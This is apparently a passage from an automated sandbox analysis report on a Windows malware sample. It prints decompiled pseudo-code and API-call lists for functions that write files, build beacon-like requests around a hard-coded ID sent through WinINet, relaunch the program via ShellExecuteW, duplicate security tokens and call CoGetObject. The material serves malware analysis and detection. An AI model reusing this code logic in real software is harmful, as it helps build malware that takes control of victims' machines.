                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$InitVariant$AllocateInitialize_swprintfwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2550189856-0
                                                                                        • Opcode ID: 3f24eb82e77c7db4ac39f59d52d4b38cdfa0bdfe61f1436edeb8bebd0136be23
                                                                                        • Instruction ID: 34010a8620d9c8899b94cc26a3947e1abdf1f5591684aa8c2c83d3d23a8b7264
                                                                                        • Opcode Fuzzy Hash: 3f24eb82e77c7db4ac39f59d52d4b38cdfa0bdfe61f1436edeb8bebd0136be23
                                                                                        • Instruction Fuzzy Hash: 2FC15570900209EFDB10DF90DD48BAE7B75FF04309F208579E505BA1A1D77AA94ACF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004063FB, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 62memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004063FB(wchar_t* _a4, char _a8) {
				WCHAR* _v8;
				short _v528;
				signed int _t22;
				void* _t24;
				int _t29;
				void* _t34;
				void* _t35;

				GetCurrentDirectoryW(0x104,  &_v528);
				if((GetFileAttributesW(_a4) & 0x00000010) == 0) {
					_t22 = wcslen(_a4);
					_t35 = _t34 + 4;
					_t24 = RtlAllocateHeap( *0x40f5d6, 8, 2 + _t22 * 2);
					_v8 = _t24;
					if(_v8 != 0) {
						wcscpy(_v8, _a4);
						_t34 = _t35 + 8;
						 *(PathFindFileNameW(_v8)) = 0;
						SetCurrentDirectoryW(_v8);
						RtlFreeHeap( *0x40f5d6, 0, _v8);
						L5:
						_t16 =  &_a8; // 0x40672d
						_t29 = strlen( *_t16);
						_t17 =  &_a8; // 0x40672d
						E00401C9B(0x40f610,  *_t17, _t29);
						return SetCurrentDirectoryW( &_v528);
					}
					return _t24;
				}
				SetCurrentDirectoryW(_a4);
				goto L5;
			}










                                                                                        0x00406415
                                                                                        0x00406429
                                                                                        0x00406439
                                                                                        0x0040643f
                                                                                        0x00406452
                                                                                        0x00406458
                                                                                        0x0040645f
                                                                                        0x00406469
                                                                                        0x0040646f
                                                                                        0x0040647b
                                                                                        0x00406483
                                                                                        0x00406494
                                                                                        0x0040649a
                                                                                        0x0040649a
                                                                                        0x0040649d
                                                                                        0x004064a7
                                                                                        0x004064af
                                                                                        0x00000000
                                                                                        0x004064bb
                                                                                        0x00000000
                                                                                        0x0040645f
                                                                                        0x0040642e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,00000003), ref: 00406415
                                                                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?,00000003), ref: 0040641E
                                                                                        • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000003), ref: 0040642E
                                                                                        • wcslen.NTDLL ref: 00406439
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000003), ref: 00406452
                                                                                        • strlen.NTDLL ref: 0040649D
                                                                                          • Part of subcall function 00401C9B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00401CC2
                                                                                          • Part of subcall function 00401C9B: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00401CE0
                                                                                          • Part of subcall function 00401C9B: NtClose.NTDLL(000000FF), ref: 00401CF4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,0040F610,?,00000000), ref: 004064BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryFile$AllocateAttributesCloseCreateHeapWritestrlenwcslen
                                                                                        • String ID: -g@
                                                                                        • API String ID: 2483183635-2478092369
                                                                                        • Opcode ID: 86613c93632f326b70cbcd28f7034b2996bff5ff15503ac7b63aebd1d98503b6
                                                                                        • Instruction ID: e5a510f47fc1cffbdd5bc3104043d0cbda6536fb01490dcca553208fb85b6640
                                                                                        • Opcode Fuzzy Hash: 86613c93632f326b70cbcd28f7034b2996bff5ff15503ac7b63aebd1d98503b6
                                                                                        • Instruction Fuzzy Hash: 93212C76400208FFEB21AFA4EE09B9D7B38FB44311F108071F906B15B1D7365A69EB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408995, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00408995() {
				void* _v8;
				char* _v12;
				char* _v16;
				int _t22;
				int _t23;
				int _t24;
				void* _t34;

				_v12 = 0;
				_v16 = E00401D08(0x40f1c3);
				_t34 = E00401D08(0x40c004);
				_v12 = E004083CA();
				if(_v12 != 0) {
					_t22 = strlen(_v16);
					_t23 = strlen(_t34);
					_t24 = strlen(_v12);
					_v8 = RtlAllocateHeap( *0x40f5d6, 8, _t22 + _t23 + _t24 + strlen("0601ac206b9e361"));
					if(_v8 != 0) {
						E004085B7(_v8, sprintf(_v8, _v16, _t34, "0601ac206b9e361", _v12));
						RtlFreeHeap( *0x40f5d6, 0, _v8);
					}
				}
				RtlFreeHeap( *0x40f5d6, 0, _v12);
				RtlFreeHeap( *0x40f5d6, 0, _t34);
				return RtlFreeHeap( *0x40f5d6, 0, _v16);
			}










                                                                                        0x004089a0
                                                                                        0x004089b1
                                                                                        0x004089be
                                                                                        0x004089c5
                                                                                        0x004089cc
                                                                                        0x004089d5
                                                                                        0x004089e1
                                                                                        0x004089ef
                                                                                        0x00408a19
                                                                                        0x00408a20
                                                                                        0x00408a3e
                                                                                        0x00408a4e
                                                                                        0x00408a4e
                                                                                        0x00408a20
                                                                                        0x00408a5f
                                                                                        0x00408a6e
                                                                                        0x00408a8d

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040842C
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040843A
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408448
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408456
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408464
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408472
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408480
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040848E
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040849C
                                                                                          • Part of subcall function 004083CA: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004084B7
                                                                                          • Part of subcall function 004083CA: _swprintf.NTDLL ref: 004084E4
                                                                                          • Part of subcall function 004083CA: RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00000000), ref: 00408509
                                                                                          • Part of subcall function 004083CA: RtlFreeHeap.NTDLL(00000000,?), ref: 0040851D
                                                                                        • strlen.NTDLL ref: 004089D5
                                                                                        • strlen.NTDLL ref: 004089E1
                                                                                        • strlen.NTDLL ref: 004089EF
                                                                                        • strlen.NTDLL ref: 004089FF
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408A13
                                                                                        • sprintf.NTDLL ref: 00408A31
                                                                                          • Part of subcall function 004085B7: InternetCloseHandle.WININET(00000000), ref: 004088A8
                                                                                          • Part of subcall function 004085B7: InternetCloseHandle.WININET(00000000), ref: 004088B7
                                                                                          • Part of subcall function 004085B7: InternetCloseHandle.WININET(00000000), ref: 004088C6
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088DD
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088F4
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040890B
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408922
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00408A4E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,0040C004), ref: 00408A5F
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408A6E
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408A7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Freewcslen$Allocatestrlen$CloseHandleInternet$_swprintfsprintf
                                                                                        • String ID: 0601ac206b9e361
                                                                                        • API String ID: 3103718647-1052532395
                                                                                        • Opcode ID: 3d3457962de922cdfbf91ef8efe8748602cbc80aa8267ec0ebd1debec19913b1
                                                                                        • Instruction ID: b943f6e790cac8dbb39e703a917fdd03bf21e5a8bfba539a12e109ef2e2e7866
                                                                                        • Opcode Fuzzy Hash: 3d3457962de922cdfbf91ef8efe8748602cbc80aa8267ec0ebd1debec19913b1
                                                                                        • Instruction Fuzzy Hash: 382127B1901208BFEB216FA0EE0AFAD7B74FB04309F240475F601715B1EB761A699B5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040428D, Relevance: 16.7, APIs: 11, Instructions: 216memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 004042DE
                                                                                        • VariantInit.OLEAUT32(?), ref: 00404422
                                                                                        • _swprintf.NTDLL ref: 00404451
                                                                                        • VariantClear.OLEAUT32(?), ref: 00404476
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004044D0
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004044E7
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004044FE
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404515
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040452C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404543
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040455A
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Variant$AllocateClearInitInitialize_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 943987305-0
                                                                                        • Opcode ID: 9ac38d6b186c4428392428dd786d34e63089a0cd43ff480591ad364da24d959b
                                                                                        • Instruction ID: d5d5127211e33d520d232e1592a3508245044a1f8bf9fbf2929d31acc83c229f
                                                                                        • Opcode Fuzzy Hash: 9ac38d6b186c4428392428dd786d34e63089a0cd43ff480591ad364da24d959b
                                                                                        • Instruction Fuzzy Hash: 00913671A00209EBEB219F90DC49BEEBBB5FF44704F208175E600BA2E0D3795955DFA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403D8F, Relevance: 15.1, APIs: 10, Instructions: 68memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00403D8F() {
				short _v524;
				short _v1044;
				short _v1564;
				long _v2084;
				void* _t34;
				void* _t35;
				void* _t36;

				GetModuleFileNameW( *0x40f5da,  &_v524, 0x104);
				GetShortPathNameW( &_v524,  &_v2084, 0x104);
				_t34 = E00401D08(0x40e7be);
				wcscpy( &_v1044, _t34);
				RtlFreeHeap( *0x40f5d6, 0, _t34);
				wcscat( &_v1044,  &_v2084);
				_t35 = E00401D08(0x40e7f2);
				wcscat( &_v1044, _t35);
				RtlFreeHeap( *0x40f5d6, 0, _t35);
				_t36 = E00401D08(0x40e7de);
				GetEnvironmentVariableW(_t36,  &_v1564, 0x104);
				RtlFreeHeap( *0x40f5d6, 0, _t36);
				return ShellExecuteW(0, 0,  &_v1564,  &_v1044, 0, 0);
			}










                                                                                        0x00403daa
                                                                                        0x00403dc3
                                                                                        0x00403dd3
                                                                                        0x00403ddd
                                                                                        0x00403def
                                                                                        0x00403e03
                                                                                        0x00403e16
                                                                                        0x00403e20
                                                                                        0x00403e32
                                                                                        0x00403e42
                                                                                        0x00403e51
                                                                                        0x00403e60
                                                                                        0x00403e85

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 00403DAA
                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00403DC3
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • wcscpy.NTDLL ref: 00403DDD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403DEF
                                                                                        • wcscat.NTDLL ref: 00403E03
                                                                                        • wcscat.NTDLL ref: 00403E20
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403E32
                                                                                        • GetEnvironmentVariableW.KERNEL32(00000000,?,00000104,0040E7DE), ref: 00403E51
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403E60
                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00403E7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Namewcscat$AllocateEnvironmentExecuteFileModulePathShellShortVariablewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2400797703-0
                                                                                        • Opcode ID: a4e0b2ea962a39828c207258dcd41693dd5c123b769e641acf5216dca4a88896
                                                                                        • Instruction ID: 750baac0f5715775a624c6a095a865806a038d97b203efbd5f9f55d6af3a4420
                                                                                        • Opcode Fuzzy Hash: a4e0b2ea962a39828c207258dcd41693dd5c123b769e641acf5216dca4a88896
                                                                                        • Instruction Fuzzy Hash: C12150B254020CBBD720ABA0ED4AFE9376CFB08305F000476F605F24A1DA7169998BA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408A8E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 102memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E00408A8E(void* __fp0, signed int _a4) {
				char _v16;
				intOrPtr _v20;
				void* _v24;
				char* _v28;
				char* _v32;
				char _v48;
				void* _t34;
				int _t35;
				char _t38;

				_v24 = 0;
				_v32 = 0;
				_v28 = 0;
				_v32 = E00401D08(0x40f1f6);
				if(_v32 != 0) {
					_v24 = E00408249();
					if(_v24 != 0) {
						_t34 = E00401147(_t33, _v24, _v24);
						_t35 = strlen(_v32);
						_t11 = _t34 + _t35 + strlen("0601ac206b9e361") + 0x40; // 0x40
						_t38 = RtlAllocateHeap( *0x40f5d6, 8, _t11);
						_v28 = _t38;
						if(_v28 != 0) {
							_t39 = _a4;
							asm("wait");
							asm("fninit");
							asm("fild qword [0x40f63c]");
							_v20 = 0x40000000;
							asm("fild dword [ebp-0x10]");
							asm("fdivp st1, st0");
							[tword [ebp-0xc] = __fp0;
							E00401430( &_v16, 2,  &_v48, 2);
							E004085B7(_v28, sprintf(_v28, _v32, _v24, "0601ac206b9e361",  *0x40f638,  &_v48,  *0x40f644, _a4 / 0x3e8, _t39 % 0x3e8));
							_t38 = RtlFreeHeap( *0x40f5d6, 0, _v28);
						}
					}
				}
				if(_v24 != 0) {
					_t38 = RtlFreeHeap( *0x40f5d6, 0, _v24);
				}
				if(_v32 == 0) {
					return _t38;
				} else {
					return RtlFreeHeap( *0x40f5d6, 0, _v32);
				}
			}












                                                                                        0x00408a99
                                                                                        0x00408aa0
                                                                                        0x00408aa7
                                                                                        0x00408ab8
                                                                                        0x00408abf
                                                                                        0x00408acb
                                                                                        0x00408ad2
                                                                                        0x00408adf
                                                                                        0x00408ae9
                                                                                        0x00408b04
                                                                                        0x00408b10
                                                                                        0x00408b16
                                                                                        0x00408b1d
                                                                                        0x00408b21
                                                                                        0x00408b31
                                                                                        0x00408b32
                                                                                        0x00408b34
                                                                                        0x00408b3a
                                                                                        0x00408b41
                                                                                        0x00408b44
                                                                                        0x00408b46
                                                                                        0x00408b55
                                                                                        0x00408b87
                                                                                        0x00408b97
                                                                                        0x00408b97
                                                                                        0x00408b1d
                                                                                        0x00408ad2
                                                                                        0x00408ba1
                                                                                        0x00408bae
                                                                                        0x00408bae
                                                                                        0x00408bb8
                                                                                        0x00408bd3
                                                                                        0x00408bba
                                                                                        0x00000000
                                                                                        0x00408bc5

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408BAE
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408BC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate
                                                                                        • String ID: 0601ac206b9e361
                                                                                        • API String ID: 3472947110-1052532395
                                                                                        • Opcode ID: 282238462acdf5acc471cb7da1bb4f9528e7c10fa6baeaeda1a475af4ee8dc6a
                                                                                        • Instruction ID: 53233c6c3efd7d11c22a32d7b2ef3227990e67a63ea7894f42ffe2d7879e7d3d
                                                                                        • Opcode Fuzzy Hash: 282238462acdf5acc471cb7da1bb4f9528e7c10fa6baeaeda1a475af4ee8dc6a
                                                                                        • Instruction Fuzzy Hash: A7315D71D00209AFDB219FA1DE0ABAE7B75FB04304F10403AF601715E1DB761A5ADB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004024C1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E004024C1(intOrPtr _a4) {
				intOrPtr _v20;
				void _v40;
				long _v560;
				void* _t24;
				void* _t25;
				void* _t26;

				_t26 = E00401D08(0x40cf47);
				_t25 = E00401D08(0x40cf85);
				wcscpy( &_v560, _t26);
				wcscat( &_v560, _t25);
				RtlFreeHeap( *0x40f5d6, 0, _t25);
				RtlFreeHeap( *0x40f5d6, 0, _t26);
				memset( &_v40, 0, 0x24);
				_v40 = 0x24;
				_v20 = 4;
				_t24 = E00401D08(0x40cfd7);
				 *0x40f890( &_v560,  &_v40, _t24, _a4);
				return RtlFreeHeap( *0x40f5d6, 0, _t24);
			}









                                                                                        0x004024d9
                                                                                        0x004024e5
                                                                                        0x004024ef
                                                                                        0x00402500
                                                                                        0x00402512
                                                                                        0x00402521
                                                                                        0x0040252f
                                                                                        0x00402538
                                                                                        0x0040253f
                                                                                        0x00402550
                                                                                        0x00402561
                                                                                        0x0040257e

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • wcscpy.NTDLL ref: 004024EF
                                                                                        • wcscat.NTDLL ref: 00402500
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402512
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402521
                                                                                        • memset.NTDLL ref: 0040252F
                                                                                        • CoGetObject.OLE32(?,00000024,00000000,004025AF), ref: 00402561
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402570
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateObjectmemsetwcscatwcscpy
                                                                                        • String ID: $
                                                                                        • API String ID: 2323637184-3993045852
                                                                                        • Opcode ID: b3310a9516806f475f99f0fe9cf5f333df13000ef1b4d81828e3b0836d30b519
                                                                                        • Instruction ID: 3b0b86d69b12ddca7a1691911cbadea849a7ccc3a35efded6c453c494278c5a2
                                                                                        • Opcode Fuzzy Hash: b3310a9516806f475f99f0fe9cf5f333df13000ef1b4d81828e3b0836d30b519
                                                                                        • Instruction Fuzzy Hash: DC118272900208BBD720ABA0FD4EF9E3BACEB48711F100576F600B10A0D67659198B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407153, Relevance: 12.1, APIs: 8, Instructions: 72memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00407153(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12) {
				long _v8;
				int _t18;
				long _t27;
				void* _t34;
				intOrPtr _t35;

				_v8 = 0;
				_t35 = _a8;
				_t18 = wcslen(_t35 + 4);
				_t34 = RtlAllocateHeap( *0x40f5d6, 8, 0x12 + (_t18 + wcslen(_a12)) * 2);
				if(_t34 != 0) {
					 *_t34 = 0x5c005c;
					 *((intOrPtr*)(_t34 + 4)) = 0x5c003f;
					 *((intOrPtr*)(_t34 + 8)) = 0x4e0055;
					 *((intOrPtr*)(_t34 + 0xc)) = 0x5c0043;
					wcscat(_t34, _t35 + 4);
					E00401A3A(_t34);
					wcscat(_t34, _a12);
					if(_a4 != 0) {
						E00401AE1(_a4);
					}
					_t27 = GetFileAttributesW(_t34);
					if(_t27 != 0xffffffff && SetFileAttributesW(_t34, _t27) != 0) {
						_v8 = 1;
					}
					if(_a4 != 0) {
						E00401B60();
					}
					RtlFreeHeap( *0x40f5d6, 0, _t34);
				}
				return _v8;
			}








                                                                                        0x0040715e
                                                                                        0x00407165
                                                                                        0x0040716c
                                                                                        0x0040719b
                                                                                        0x0040719f
                                                                                        0x004071a5
                                                                                        0x004071ab
                                                                                        0x004071b2
                                                                                        0x004071b9
                                                                                        0x004071c5
                                                                                        0x004071cf
                                                                                        0x004071d8
                                                                                        0x004071e5
                                                                                        0x004071ea
                                                                                        0x004071ea
                                                                                        0x004071f0
                                                                                        0x004071f9
                                                                                        0x00407207
                                                                                        0x00407207
                                                                                        0x00407212
                                                                                        0x00407214
                                                                                        0x00407214
                                                                                        0x00407222
                                                                                        0x00407222
                                                                                        0x00407233

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040716C
                                                                                        • wcslen.NTDLL ref: 0040717A
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407195
                                                                                        • wcscat.NTDLL ref: 004071C5
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 004071D8
                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004071F0
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004071FD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407222
                                                                                          • Part of subcall function 00401AE1: NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
                                                                                          • Part of subcall function 00401AE1: NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
                                                                                          • Part of subcall function 00401AE1: NtClose.NTDLL(005C003F), ref: 00401B4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: wcslen$AttributesFileHeapwcscat$AllocateCloseDuplicateFreeInformationThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 2286005353-0
                                                                                        • Opcode ID: 0a8deabfdbdd6a5a1d26168d77fecfe75273a124673a983e3017bc5ea49e6f23
                                                                                        • Instruction ID: 5216cba3c5a82563622fdb12ffef802aad29dde6ed334a9f4abb9ac8d2484c4f
                                                                                        • Opcode Fuzzy Hash: 0a8deabfdbdd6a5a1d26168d77fecfe75273a124673a983e3017bc5ea49e6f23
                                                                                        • Instruction Fuzzy Hash: 7C21B3B0500304EFDB209FA4ED88F5A3BACFB00315F148939F815A62B1DB75E959CB69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407445, Relevance: 9.1, APIs: 6, Instructions: 104memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040744D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00407466
                                                                                        • _swprintf.NTDLL ref: 00407478
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040748D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407722
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407739
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate_swprintfwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 793461835-0
                                                                                        • Opcode ID: 02988a6e1fed529179a56413732385f8f95b222a6e6ccc85a2f2f023d3b96e8f
                                                                                        • Instruction ID: 51fda382e1c4280d7ddda007286011f921d6c84c7e02d989648ca6b3ea8bccd1
                                                                                        • Opcode Fuzzy Hash: 02988a6e1fed529179a56413732385f8f95b222a6e6ccc85a2f2f023d3b96e8f
